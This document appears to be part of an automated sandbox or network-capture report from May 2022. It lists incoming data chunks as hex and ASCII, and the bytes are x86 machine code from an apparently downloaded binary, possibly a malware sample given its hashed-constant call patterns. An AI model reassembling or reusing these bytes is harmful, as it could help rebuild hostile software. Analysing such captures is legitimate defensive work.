2022-05-16 08:29:53 UTC	27	IN	Data Raw: 10 00 00 00 00 8b 55 f8 c7 42 14 0f 00 00 00 c6 45 ff 00 8d 45 ff 50 b9 01 00 00 00 6b d1 00 03 55 f8 52 e8 f4 15 00 00 83 c4 08 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 89 4d f8 8b 45 f8 8b 4d 08 3b 48 14 77 45 8b 4d f8 e8 44 04 00 00 89 45 f4 8b 55 f8 8b 45 08 89 42 10 0f b6 4d 0c 51 8b 55 08 52 8b 45 f4 50 e8 b6 15 00 00 83 c4 0c c6 45 ff 00 8d 4d ff 51 8b 55 f4 03 55 08 52 e8 8f 15 00 00 83 c4 08 8b 45 f8 eb 1b 33 c0 88 45 fe 0f b6 4d 0c 51 0f b6 55 fe 52 8b 45 08 50 8b 4d f8 e8 bc 47 00 00 8b e5 5d c2 08 00 cc cc cc cc cc cc 55 8b ec 83 ec 08 89 4d f8 0f b6 45 10 50 8b 4d 0c 51 8b 55 08 52 e8 55 15 00 00 83 c4 0c c6 45 ff 00 8d 45 ff 50 8b 4d 08 03 4d 0c 51 e8 2e 15 00 00 83 c4 08 8b e5 5d c2 0c 00 cc cc cc cc cc 55 8b ec Data Ascii: UBEEPkUR]UMEM;HwEMDEUEBMQUREPEMQUURE3EMQUREPMG]UMEPMQURUEEPMMQ.]U
2022-05-16 08:29:53 UTC	28	IN	Data Raw: 8b 45 08 8b e5 5d c2 04 00 cc 55 8b ec 51 89 4d fc 8b 45 fc 8b 48 10 51 8b 4d 08 e8 aa ea ff ff 8b 45 08 8b e5 5d c2 04 00 cc 55 8b ec 51 89 4d fc 8b 45 fc 8b 48 08 51 8b 4d 08 e8 8a ea ff ff 8b 45 08 8b e5 5d c2 04 00 cc 55 8b ec 51 89 4d fc 8b 45 fc 8a 40 0d 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc 8a 40 0c 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc c7 00 24 7f 9e 00 8b 4d fc e8 18 11 00 00 8b 4d fc e8 60 d7 ff ff 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 89 4d fc 8b 45 fc 8b 08 8b 51 1c 89 55 f8 8b 45 08 50 8b 4d fc ff 55 f8 8b 45 08 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 89 4d fc 8b 45 fc 8b 08 8b 51 18 89 55 f8 8b Data Ascii: E]UQMEHQME]UQMEHQME]UQME@]UQME@]UQME$MM`]UMEQUEPMUE]UMEQU
2022-05-16 08:29:53 UTC	29	IN	Data Raw: 55 10 52 8d 85 6c ff ff ff 50 8b 4d 08 51 e8 8d fc ff ff 83 c4 18 8b 10 8b 40 04 89 55 10 89 45 14 8b 4d 24 2b 4d c8 51 8b 55 c8 52 8d 4d e4 e8 2c e4 ff ff 50 8b 45 14 50 8b 4d 10 51 8d 95 64 ff ff ff 52 8b 45 08 50 e8 53 fc ff ff 83 c4 18 8b 08 8b 50 04 89 4d 10 89 55 14 6a 00 6a 00 8b 4d 18 e8 59 da ff ff 8b 45 bc 50 0f b6 4d 1c 51 8b 55 14 52 8b 45 10 50 8b 4d 0c 51 8b 55 08 52 e8 cb fb ff ff 83 c4 18 8d 4d cc e8 80 e4 ff ff 8d 4d e4 e8 78 e4 ff ff 8b 45 0c 8b 4d fc 33 cd e8 f8 6c 00 00 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 8b 45 0c 89 45 f8 8b 4d f8 c6 01 25 8b 55 f8 83 c2 01 89 55 f8 8b 45 14 83 e0 20 74 0f 8b 4d f8 c6 01 2b 8b 55 f8 83 c2 01 89 55 f8 8b 45 14 83 e0 08 74 0f 8b 4d f8 c6 01 23 8b 55 f8 83 c2 01 89 55 f8 b8 01 00 00 00 6b Data Ascii: URlPMQ@UEM$+MQURM,PEPMQdREPSPMUjjMYEPMQUREPMQURMMxEM3l]UEEM%UUE tM+UUEtM#UUk
2022-05-16 08:29:53 UTC	31	IN	Data Raw: c7 45 bc 00 00 00 00 eb 35 8b 45 c8 50 6a 00 8d 4d e4 e8 e7 de ff ff 50 8b 4d 14 51 8b 55 10 52 8d 85 54 ff ff ff 50 8b 4d 08 51 e8 0e f7 ff ff 83 c4 18 8b 10 8b 40 04 89 55 10 89 45 14 8b 4d 24 2b 4d c8 51 8b 55 c8 52 8d 4d e4 e8 ad de ff ff 50 8b 45 14 50 8b 4d 10 51 8d 95 4c ff ff ff 52 8b 45 08 50 e8 d4 f6 ff ff 83 c4 18 8b 08 8b 50 04 89 4d 10 89 55 14 6a 00 6a 00 8b 4d 18 e8 da d4 ff ff 8b 45 bc 50 0f b6 4d 1c 51 8b 55 14 52 8b 45 10 50 8b 4d 0c 51 8b 55 08 52 e8 4c f6 ff ff 83 c4 18 8d 4d cc e8 01 df ff ff 8d 4d e4 e8 f9 de ff ff 8b 45 0c 8b 4d fc 33 cd e8 79 67 00 00 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 8b 45 0c 89 45 f8 8b 4d f8 c6 01 25 8b 55 f8 83 c2 01 89 55 f8 8b 45 14 83 e0 20 74 0f 8b 4d f8 c6 01 2b 8b 55 f8 83 c2 01 89 55 Data Ascii: E5EPjMPMQURTPMQ@UEM$+MQURMPEPMQLREPPMUjjMEPMQUREPMQURLMMEM3yg]UEEM%UUE tM+UU
2022-05-16 08:29:53 UTC	32	IN	Data Raw: f8 50 8b 4d fc e8 92 04 00 00 8b e5 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 18 89 4d fc 8b 4d fc e8 ff e6 ff ff 50 e8 a9 05 00 00 83 c4 04 89 45 f4 c7 45 f8 10 00 00 00 8d 45 f8 50 8d 4d f4 51 e8 8f fe ff ff 83 c4 08 8b 10 89 55 f0 8b 45 f0 83 e8 01 89 45 ec e8 59 be ff ff 89 45 e8 8d 4d ec 51 8d 55 e8 52 e8 c9 35 00 00 83 c4 08 8b 00 8b e5 5d c3 55 8b ec 51 89 4d fc 8b 45 08 50 e8 d0 be ff ff 83 c4 04 50 8b 4d fc e8 04 05 00 00 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 89 4d f8 8b 45 f8 83 78 14 10 72 09 c7 45 fc 01 00 00 00 eb 07 c7 45 fc 00 00 00 00 8a 45 fc 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 08 50 e8 b0 35 00 00 83 c4 04 50 e8 b7 35 00 00 83 c4 04 8b e5 5d c2 04 00 cc Data Ascii: PM]UMMPEEEPMQUEEYEMQUR5]UQMEPPME]UMExrEEE]UQMEP5P5]
2022-05-16 08:29:53 UTC	34	IN	Data Raw: 8b 55 08 03 55 10 52 e8 ce fb ff ff 83 c4 0c c6 45 ff 00 8d 45 ff 50 8b 4d 10 03 4d 14 03 4d 08 51 e8 a4 fb ff ff 83 c4 08 8b e5 5d c2 14 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 89 4d f8 8b 45 08 50 e8 ae b9 ff ff 83 c4 04 39 45 f8 74 16 33 c9 88 4d ff 0f b6 55 ff 52 8b 45 08 50 8b 4d f8 e8 d0 00 00 00 8b 45 f8 8b e5 5d c2 04 00 cc cc cc cc cc cc cc 55 8b ec 83 c8 ff 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 89 4d fc 8b 45 fc 8b 48 20 83 39 00 74 0d 8b 55 fc 8b 42 30 8b 08 89 4d f8 eb 07 c7 45 f8 00 00 00 00 8b 45 f8 99 8b e5 5d c3 55 8b ec 83 ec 20 89 4d f8 8b 4d f8 e8 bf ff ff ff 89 45 e0 89 55 e4 83 7d e4 00 7c 32 7f 06 83 7d e0 00 76 2a 8a 45 08 88 45 ff 8b 4d f8 e8 fd 00 00 00 89 45 f4 8b 4d f4 8a 55 ff 88 11 8b 45 f4 50 e8 d9 00 Data Ascii: UUREEPMMMQ]UMEP9Et3MUREPME]U]UMEH 9tUB0MEE]U MMEU}\|2}v*EEMEMUEP
2022-05-16 08:29:53 UTC	35	IN	Data Raw: ff ff 88 45 ef 0f b6 45 ef 50 8b 4d e4 e8 46 fb ff ff 89 45 e0 e8 fe fa ff ff 89 45 dc 8d 4d e0 51 8d 55 dc 52 e8 1e fc ff ff 83 c4 08 0f b6 c0 85 c0 74 0b 8b 4d e8 83 c9 04 89 4d e8 eb 05 e9 7b ff ff ff 83 7d e8 00 75 46 8b 55 08 8b 02 8b 4d 08 03 48 04 e8 8e db ff ff 89 45 d8 8b 4d b0 51 8b 55 ac 52 8b 45 0c 50 8b 4d d8 e8 97 2e 00 00 89 45 8c 89 55 90 8b 4d 8c 3b 4d ac 75 08 8b 55 90 3b 55 b0 74 09 8b 45 e8 83 c8 04 89 45 e8 83 7d e8 00 0f 85 8b 00 00 00 eb 12 8b 4d b4 83 e9 01 8b 55 b8 83 da 00 89 4d b4 89 55 b8 83 7d b8 00 7c 71 7f 06 83 7d b4 00 76 69 8b 45 08 8b 08 8b 55 08 03 51 04 8b ca e8 1a db ff ff 89 45 d4 8b 45 08 8b 08 8b 55 08 03 51 04 8b ca e8 e5 da ff ff 88 45 ee 0f b6 45 ee 50 8b 4d d4 e8 65 fa ff ff 89 45 d0 e8 1d fa ff ff 89 45 cc 8d Data Ascii: EEPMFEEMQURtMM{}uFUMHEMQUREPM.EUM;MuU;UtEE}MUMU}\|q}viEUQEEUQEEPMeEE
2022-05-16 08:29:53 UTC	36	IN	Data Raw: 12 c1 ff ff 8d 4d e0 e8 6a c1 ff ff 0f b6 d0 85 d2 74 7c 8d 4d e0 e8 8b c1 ff ff 89 45 fc 8b 45 fc 89 45 f4 8b 4d fc 83 e9 01 89 4d fc 83 7d f4 00 74 5c 68 e9 42 b8 23 68 ed 7c 84 4d e8 74 c0 ff ff 83 c4 08 89 45 f0 8b 55 fc 52 8d 4d e0 e8 72 c1 ff ff 89 45 ec 68 e9 42 b8 23 68 ed 7c 84 4d e8 d0 ae ff ff 83 c4 08 8b f0 8b 45 f0 50 8b 4d ec 51 e8 6e 30 00 00 83 c4 08 3b c6 75 0e 8b 55 fc 52 8d 4d e0 e8 6b c1 ff ff eb 17 eb 8f 8d 4d f8 e8 cf c1 ff ff 0f b6 c0 85 c0 0f 85 53 ff ff ff 33 c0 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 20 56 8d 4d f8 e8 81 c1 ff ff 8b 45 f8 8b 48 18 51 8d 4d e0 e8 42 c0 ff ff 8d 4d e0 e8 9a c0 ff ff 0f b6 d0 85 d2 74 7c 8d 4d e0 e8 bb c0 ff ff 89 45 fc 8b 45 fc 89 45 f4 8b 4d fc 83 e9 01 89 4d fc 83 7d Data Ascii: Mjt\|MEEEMM}t\hB#h\|MtEURMrEhB#h\|MEPMQn0;uURMkMS3^]U VMEHQMBMt\|MEEEMM}
2022-05-16 08:29:53 UTC	38	IN	Data Raw: 52 8d 4d e0 e8 8b bc ff ff eb 17 eb 8f 8d 4d f8 e8 ef bc ff ff 0f b6 c0 85 c0 0f 85 53 ff ff ff 33 c0 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 20 56 8d 4d f8 e8 a1 bc ff ff 8b 45 f8 8b 48 18 51 8d 4d e0 e8 62 bb ff ff 8d 4d e0 e8 ba bb ff ff 0f b6 d0 85 d2 74 7c 8d 4d e0 e8 db bb ff ff 89 45 fc 8b 45 fc 89 45 f4 8b 4d fc 83 e9 01 89 4d fc 83 7d f4 00 74 5c 68 a7 28 dd c6 68 f3 63 e1 85 e8 c4 ba ff ff 83 c4 08 89 45 f0 8b 55 fc 52 8d 4d e0 e8 c2 bb ff ff 89 45 ec 68 a7 28 dd c6 68 f3 63 e1 85 e8 20 a9 ff ff 83 c4 08 8b f0 8b 45 f0 50 8b 4d ec 51 e8 be 2a 00 00 83 c4 08 3b c6 75 0e 8b 55 fc 52 8d 4d e0 e8 bb bb ff ff eb 17 eb 8f 8d 4d f8 e8 1f bc ff ff 0f b6 c0 85 c0 0f 85 53 ff ff ff 33 c0 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc Data Ascii: RMMS3^]U VMEHQMbMt\|MEEEMM}t\h(hcEURMEh(hc EPMQ*;uURMMS3^]
2022-05-16 08:29:53 UTC	39	IN	Data Raw: cc 2d 57 50 68 54 ce 3a b4 e8 e4 b5 ff ff 83 c4 08 89 45 f0 8b 55 fc 52 8d 4d e0 e8 e2 b6 ff ff 89 45 ec 68 cc 2d 57 50 68 54 ce 3a b4 e8 40 a4 ff ff 83 c4 08 8b f0 8b 45 f0 50 8b 4d ec 51 e8 de 25 00 00 83 c4 08 3b c6 75 0e 8b 55 fc 52 8d 4d e0 e8 db b6 ff ff eb 17 eb 8f 8d 4d f8 e8 3f b7 ff ff 0f b6 c0 85 c0 0f 85 53 ff ff ff 33 c0 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 20 56 8d 4d f8 e8 f1 b6 ff ff 8b 45 f8 8b 48 18 51 8d 4d e0 e8 b2 b5 ff ff 8d 4d e0 e8 0a b6 ff ff 0f b6 d0 85 d2 74 7c 8d 4d e0 e8 2b b6 ff ff 89 45 fc 8b 45 fc 89 45 f4 8b 4d fc 83 e9 01 89 4d fc 83 7d f4 00 74 5c 68 c0 4d 31 b3 68 d0 bb fa 7c e8 14 b5 ff ff 83 c4 08 89 45 f0 8b 55 fc 52 8d 4d e0 e8 12 b6 ff ff 89 45 ec 68 c0 4d 31 b3 68 d0 bb fa 7c e8 70 Data Ascii: -WPhT:EURMEh-WPhT:@EPMQ%;uURMM?S3^]U VMEHQMMt\|M+EEEMM}t\hM1h\|EURMEhM1h\|p
2022-05-16 08:29:53 UTC	40	IN	Data Raw: 55 8b ec 83 ec 20 56 8d 4d f8 e8 11 b2 ff ff 8b 45 f8 8b 48 18 51 8d 4d e0 e8 d2 b0 ff ff 8d 4d e0 e8 2a b1 ff ff 0f b6 d0 85 d2 74 7c 8d 4d e0 e8 4b b1 ff ff 89 45 fc 8b 45 fc 89 45 f4 8b 4d fc 83 e9 01 89 4d fc 83 7d f4 00 74 5c 68 df b4 95 34 68 7b e6 ea be e8 34 b0 ff ff 83 c4 08 89 45 f0 8b 55 fc 52 8d 4d e0 e8 32 b1 ff ff 89 45 ec 68 df b4 95 34 68 7b e6 ea be e8 90 9e ff ff 83 c4 08 8b f0 8b 45 f0 50 8b 4d ec 51 e8 2e 20 00 00 83 c4 08 3b c6 75 0e 8b 55 fc 52 8d 4d e0 e8 2b b1 ff ff eb 17 eb 8f 8d 4d f8 e8 8f b1 ff ff 0f b6 c0 85 c0 0f 85 53 ff ff ff 33 c0 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 20 56 8d 4d f8 e8 41 b1 ff ff 8b 45 f8 8b 48 18 51 8d 4d e0 e8 02 b0 ff ff 8d 4d e0 e8 5a b0 ff ff 0f b6 d0 85 d2 74 7c 8d 4d Data Ascii: U VMEHQMM*t\|MKEEEMM}t\h4h{4EURM2Eh4h{EPMQ. ;uURM+MS3^]U VMAEHQMMZt\|M
2022-05-16 08:29:53 UTC	42	IN	Data Raw: 08 8b f0 8b 45 f0 50 8b 4d ec 51 e8 4e 1b 00 00 83 c4 08 3b c6 75 0e 8b 55 fc 52 8d 4d e0 e8 4b ac ff ff eb 17 eb 8f 8d 4d f8 e8 af ac ff ff 0f b6 c0 85 c0 0f 85 53 ff ff ff 33 c0 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 20 56 8d 4d f8 e8 61 ac ff ff 8b 45 f8 8b 48 18 51 8d 4d e0 e8 22 ab ff ff 8d 4d e0 e8 7a ab ff ff 0f b6 d0 85 d2 74 7c 8d 4d e0 e8 9b ab ff ff 89 45 fc 8b 45 fc 89 45 f4 8b 4d fc 83 e9 01 89 4d fc 83 7d f4 00 74 5c 68 ad 2c 65 a8 68 30 d7 07 45 e8 84 aa ff ff 83 c4 08 89 45 f0 8b 55 fc 52 8d 4d e0 e8 82 ab ff ff 89 45 ec 68 ad 2c 65 a8 68 30 d7 07 45 e8 e0 98 ff ff 83 c4 08 8b f0 8b 45 f0 50 8b 4d ec 51 e8 7e 1a 00 00 83 c4 08 3b c6 75 0e 8b 55 fc 52 8d 4d e0 e8 7b ab ff ff eb 17 eb 8f 8d 4d f8 e8 df ab ff ff Data Ascii: EPMQN;uURMKMS3^]U VMaEHQM"Mzt\|MEEEMM}t\h,eh0EEURMEh,eh0EEPMQ~;uURM{M
2022-05-16 08:29:53 UTC	43	IN	Data Raw: 00 6b c2 16 8b 4d 08 0f b6 14 01 52 8b 4d fc e8 18 aa ff ff 8b 4d fc 88 41 17 ba 01 00 00 00 6b c2 17 8b 4d 08 0f b6 14 01 52 8b 4d fc e8 fa a9 ff ff 8b 4d fc 88 41 18 ba 01 00 00 00 6b c2 18 8b 4d 08 0f b6 14 01 52 8b 4d fc e8 dc a9 ff ff 8b 4d fc 88 41 19 ba 01 00 00 00 6b c2 19 8b 4d 08 0f b6 14 01 52 8b 4d fc e8 be a9 ff ff 8b 4d fc 88 41 1a ba 01 00 00 00 6b c2 1a 8b 4d 08 0f b6 14 01 52 8b 4d fc e8 a0 a9 ff ff 8b 4d fc 88 41 1b ba 01 00 00 00 6b c2 1b 8b 4d 08 0f b6 14 01 52 8b 4d fc e8 82 a9 ff ff 8b 4d fc 88 41 1c ba 01 00 00 00 6b c2 1c 8b 4d 08 0f b6 14 01 52 8b 4d fc e8 64 a9 ff ff 8b 4d fc 88 41 1d ba 01 00 00 00 6b c2 1d 8b 4d 08 0f b6 14 01 52 8b 4d fc e8 46 a9 ff ff 8b 4d fc 88 41 1e ba 01 00 00 00 6b c2 1e 8b 4d 08 0f b6 14 01 52 8b 4d fc Data Ascii: kMRMMAkMRMMAkMRMMAkMRMMAkMRMMAkMRMMAkMRMdMAkMRMFMAkMRM
2022-05-16 08:29:53 UTC	44	IN	Data Raw: fc 8b 45 0c 50 e8 e0 8e ff ff 83 c4 04 8b 4d fc e8 b5 0c 00 00 8b 45 fc 8b e5 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc e8 b1 a4 ff ff 8b 4d fc e8 89 0c 00 00 8b 45 fc 8b e5 5d c2 04 00 55 8b ec 83 ec 08 81 7d 10 00 30 00 00 75 06 c6 45 ff 01 eb 04 c6 45 ff 00 8a 45 ff 88 45 fd 0f b6 4d fd 85 c9 74 07 b8 0d 00 00 00 eb 56 83 7d 0c 00 7c 0f 7f 06 83 7d 08 00 76 07 8b 45 08 eb 43 eb 41 8b 55 08 0b 55 0c 75 2d 83 7d 10 00 75 06 c6 45 fe 01 eb 04 c6 45 fe 00 8a 45 fe 88 45 fc 0f b6 4d fc 85 c9 74 09 b8 01 00 00 00 eb 14 eb 04 33 c0 eb 0e eb 0c c7 45 f8 06 00 00 00 b8 06 00 00 00 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 1c 6a 00 8d 4d e8 e8 f0 11 00 00 a1 d8 8c a0 00 89 45 fc b9 f0 8c a0 00 e8 3e 96 ff ff 89 45 ec Data Ascii: EPME]UQMMME]U}0uEEEEMtV}\|}vECAUUu-}uEEEEMt3E]UjME>E
2022-05-16 08:29:53 UTC	45	IN	Data Raw: 4d d8 51 8d 4d 0c e8 38 b6 ff ff 8b 55 e4 83 c2 01 52 8b 45 e0 50 8b 4d dc e8 b5 cc ff ff 8b 4d fc 8b 55 f0 89 11 eb 2d 0f b7 45 14 50 8b 4d 10 51 8b 55 f4 52 8b 45 fc 50 8b 4d d8 51 8d 4d 0c e8 fe b5 ff ff 8d 55 f0 52 8b 45 fc 50 e8 11 00 00 00 83 c4 08 8b 45 f8 8b e5 5d c2 10 00 cc cc cc cc cc 55 8b ec 51 8b 45 08 50 e8 13 8c ff ff 83 c4 04 50 e8 0a 8c ff ff 83 c4 04 50 6a 04 e8 df 86 ff ff 83 c4 08 89 45 fc 8b 4d 0c 51 e8 f0 8b ff ff 83 c4 04 8b 55 fc 8b 00 89 02 8b e5 5d c3 cc cc 55 8b ec 83 ec 14 89 4d fc 8b 4d fc e8 8f cc ff ff 39 45 08 76 05 e8 05 8c ff ff 8b 45 fc 8b 48 14 89 4d f0 8b 55 08 52 8b 4d fc e8 f0 09 00 00 89 45 f4 8b 4d fc e8 75 b3 ff ff 89 45 ec 8b 45 f4 83 c0 01 50 8b 4d ec e8 13 cd ff ff 89 45 f8 8b 4d fc e8 98 8b ff ff 8b 4d fc 8b Data Ascii: MQM8UREPMMU-EPMQUREPMQMUREPE]UQEPPPjEMQU]UMM9EvEHMURMEMuEEPMEMM
2022-05-16 08:29:53 UTC	46	IN	Data Raw: ff 2b 45 f4 3b 45 08 73 05 e8 53 87 ff ff 8b 45 f4 03 45 08 89 45 ec 8b 4d fc 8b 51 14 89 55 e4 8b 45 ec 50 8b 4d f8 e8 35 05 00 00 89 45 e8 8b 4d f8 e8 ba ae ff ff 89 45 dc 8b 4d e8 83 c1 01 51 8b 4d dc e8 58 c8 ff ff 89 45 f0 8b 4d fc e8 dd 86 ff ff 8b 55 fc 8b 45 ec 89 42 10 8b 4d fc 8b 55 e8 89 51 14 8b 45 f0 50 e8 b2 86 ff ff 83 c4 04 89 45 d8 83 7d e4 10 72 4b 8b 4d fc 8b 11 89 55 e0 0f b6 45 14 50 8b 4d 10 51 8b 55 f4 52 8b 45 e0 50 e8 88 86 ff ff 83 c4 04 50 8b 4d d8 51 8d 4d 0c e8 58 cc ff ff 8b 55 e4 83 c2 01 52 8b 45 e0 50 8b 4d dc e8 15 c8 ff ff 8b 4d fc 8b 55 f0 89 11 eb 2d 0f b6 45 14 50 8b 4d 10 51 8b 55 f4 52 8b 45 fc 50 8b 4d d8 51 8d 4d 0c e8 1e cc ff ff 8d 55 f0 52 8b 45 fc 50 e8 11 fa ff ff 83 c4 08 8b 45 f8 8b e5 5d c2 10 00 cc cc cc Data Ascii: +E;EsSEEEMQUEPM5EMEMQMXEMUEBMUQEPE}rKMUEPMQUREPPMQMXUREPMMU-EPMQUREPMQMUREPE]
2022-05-16 08:29:53 UTC	48	IN	Data Raw: 8b ec 83 ec 0c 89 4d fc 8b 4d fc e8 6f c2 ff ff 89 45 f8 8b 45 fc 8b 48 14 89 4d f4 8b 55 f8 52 8b 45 f4 50 8b 4d 08 51 e8 52 01 00 00 83 c4 0c 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 10 89 4d f0 8b 45 08 89 45 fc 83 7d fc 00 74 17 8b 4d fc 8b 11 8b 02 89 45 f8 6a 01 8b 4d fc ff 55 f8 89 45 f4 eb 07 c7 45 f4 00 00 00 00 8b e5 5d c2 04 00 cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 0c 50 8b 4d fc e8 1d 8a ff ff 8b 4d fc c7 01 24 7f 9e 00 0f b6 55 10 52 8b 45 08 50 8b 4d fc e8 33 01 00 00 8b 45 fc 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 0c 50 8b 4d fc e8 dd 89 ff ff 8b 4d fc c7 01 f4 7e 9e 00 8b 55 08 52 8b 4d fc e8 f8 80 ff ff 8b 45 fc 8b e5 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: MMoEEHMUREPMQR]UMEE}tMEjMUEE]UQMEPMM$UREPM3E]UQMEPMM~URME]
2022-05-16 08:29:53 UTC	49	IN	Data Raw: 51 89 4d fc 8b 45 0c 50 e8 50 7c ff ff 83 c4 04 8b 4d fc 8b 10 89 11 8b 45 fc 8b e5 5d c2 08 00 33 c0 57 8b f9 40 f0 0f c1 05 00 70 a0 00 75 19 56 be 28 7f a0 00 56 e8 93 1b 00 00 83 c6 18 59 81 fe e8 7f a0 00 75 ee 5e 8b c7 5f c3 55 8b ec 8b 45 08 56 8b f1 89 06 85 c0 75 07 e8 19 84 00 00 eb 14 83 f8 08 7d 0f 6b c0 18 05 28 7f a0 00 50 e8 6e 1b 00 00 59 8b c6 5e 5d c2 04 00 83 c8 ff f0 0f c1 05 00 70 a0 00 79 19 56 be 28 7f a0 00 56 e8 2a 1b 00 00 83 c6 18 59 81 fe e8 7f a0 00 75 ee 5e c3 8b 01 85 c0 0f 84 d9 83 00 00 83 f8 08 7d 0f 6b c0 18 05 28 7f a0 00 50 e8 30 1b 00 00 59 c3 83 61 04 00 8b c1 83 61 08 00 c7 41 04 e8 71 9e 00 c7 01 e0 71 9e 00 c3 55 8b ec 56 ff 75 08 8b f1 e8 83 78 ff ff c7 06 08 72 9e 00 8b c6 5e 5d c2 04 00 55 8b ec 51 56 ff 75 08 Data Ascii: QMEPP\|ME]3W@puV(VYu^_UEVu}k(PnY^]pyV(V*Yu^}k(P0YaaAqqUVuxr^]UQVu
2022-05-16 08:29:53 UTC	50	IN	Data Raw: 00 00 00 00 59 c9 c3 cc cc cc cc cc 56 8b 71 34 c7 01 ec 72 9e 00 85 f6 74 11 8b ce e8 4a 80 ff ff 6a 08 56 e8 92 1a 00 00 59 59 5e c3 55 8b ec 6a ff 68 57 76 42 00 64 a1 00 00 00 00 50 a1 14 70 a0 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8d 51 08 8b 42 f8 8b 40 04 c7 44 10 f8 74 73 9e 00 8b 42 f8 8b 48 04 8d 41 f8 89 44 11 f4 83 65 fc 00 52 c7 02 e4 72 9e 00 e8 a6 16 00 00 59 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc cc cc cc 2b 49 fc e9 7f 00 00 00 55 8b ec 56 8b f1 e8 c7 fe ff ff f6 45 08 01 74 0a 6a 58 56 e8 0a 1a 00 00 59 59 8b c6 5e 5d c2 04 00 55 8b ec 6a ff 68 74 76 42 00 64 a1 00 00 00 00 50 56 a1 14 70 a0 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 83 65 fc 00 56 c7 06 e4 72 9e 00 e8 34 16 00 00 f6 45 08 01 59 74 0a 6a 48 56 e8 bd 19 00 00 59 Data Ascii: YVq4rtJjVYY^UjhWvBdPp3PEdQB@DtsBHADeRrYMdY+IUVEtjXVYY^]UjhtvBdPVp3PEdeVr4EYtjHVY
2022-05-16 08:29:53 UTC	52	IN	Data Raw: 4e 40 89 56 44 5e 5b c3 b0 01 c3 33 c0 40 c3 55 8b ec 8b 4d 14 8b 45 0c 6a 03 89 01 8b 4d 20 8b 45 18 89 01 58 5d c2 1c 00 55 8b ec 8b 45 10 2b 45 0c 3b 45 14 72 03 8b 45 14 5d c2 10 00 55 8b ec 8b 4d 14 8b 45 0c 6a 03 89 01 58 5d c2 10 00 55 8b ec 56 ff 75 08 8b f1 e8 fe f7 ff ff 59 50 8b ce e8 91 fe ff ff 5e 5d c2 04 00 c2 04 00 55 8b ec 56 8b f1 e8 13 fe ff ff 8b 45 08 8b ce 83 66 3c 00 6a 20 89 46 38 e8 fc ed ff ff 83 7e 38 00 88 46 40 75 10 8b 46 0c 8b ce 6a 00 83 c8 04 50 e8 43 80 ff ff 80 7d 0c 00 74 07 56 e8 8a 10 00 00 59 5e 5d c2 08 00 55 8b ec 83 ec 34 a1 14 70 a0 00 33 c5 89 45 fc 53 8b 5d 08 57 8b f9 83 fb ff 75 07 33 c0 e9 d7 00 00 00 8b 47 20 56 8b 08 85 c9 74 22 8b 57 30 8b 32 8d 04 0e 3b c8 73 16 8d 4e ff 89 0a 8b 57 20 8b 32 8d 4e 01 89 Data Ascii: N@VD^[3@UMEjM EX]UE+E;ErE]UMEjX]UVuYP^]UVEf<j F8~8F@uFjPC}tVY^]U4p3ES]Wu3G Vt"W02;sNW 2N
2022-05-16 08:29:53 UTC	53	IN	Data Raw: d0 8b 75 c8 eb 17 8b 45 e8 8d 75 d8 03 c6 89 45 d0 8b c6 8b 75 c8 89 45 cc 84 c9 74 03 89 55 cc 8b 06 8b 70 18 8d 45 c0 50 8d 45 d8 8b ce 50 8d 45 d7 50 8d 45 c4 50 ff 75 d0 8d 47 40 ff 75 cc 50 ff 15 48 71 9e 00 8b 4d c8 ff d6 83 e8 00 74 05 83 e8 01 75 37 8d 45 d7 8d 4d d8 39 45 c0 75 43 83 7d ec 10 72 03 8b 4d d8 8b 45 c4 2b c1 8d 4d d8 50 6a 00 e8 4f f7 ff ff ff 77 4c e8 6b 78 00 00 59 3b c3 0f 85 4e ff ff ff eb 4b 48 83 e8 01 75 45 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 0f be 18 eb 34 83 7d ec 10 72 03 8b 4d d8 8b 75 e8 8b 45 c4 2b f0 03 f1 85 f6 7e 19 ff 77 4c 4e 0f be 04 06 50 e8 16 86 00 00 59 59 85 f6 7e 05 8b 45 c4 eb e7 0f b6 5d d7 8b 45 ec 83 f8 10 72 2f 8b 4d d8 40 89 45 cc 89 4d d0 3d 00 10 00 00 72 15 8d 45 cc 50 8d 45 d0 50 e8 c9 6a ff ff 8b Data Ascii: uEuEuEtUpEPEPEPEPuG@uPHqMtu7EM9EuC}rME+MPjOwLkxY;NKHuE}ErE4}rMuE+~wLNPYY~E]Er/M@EM=rEPEPj
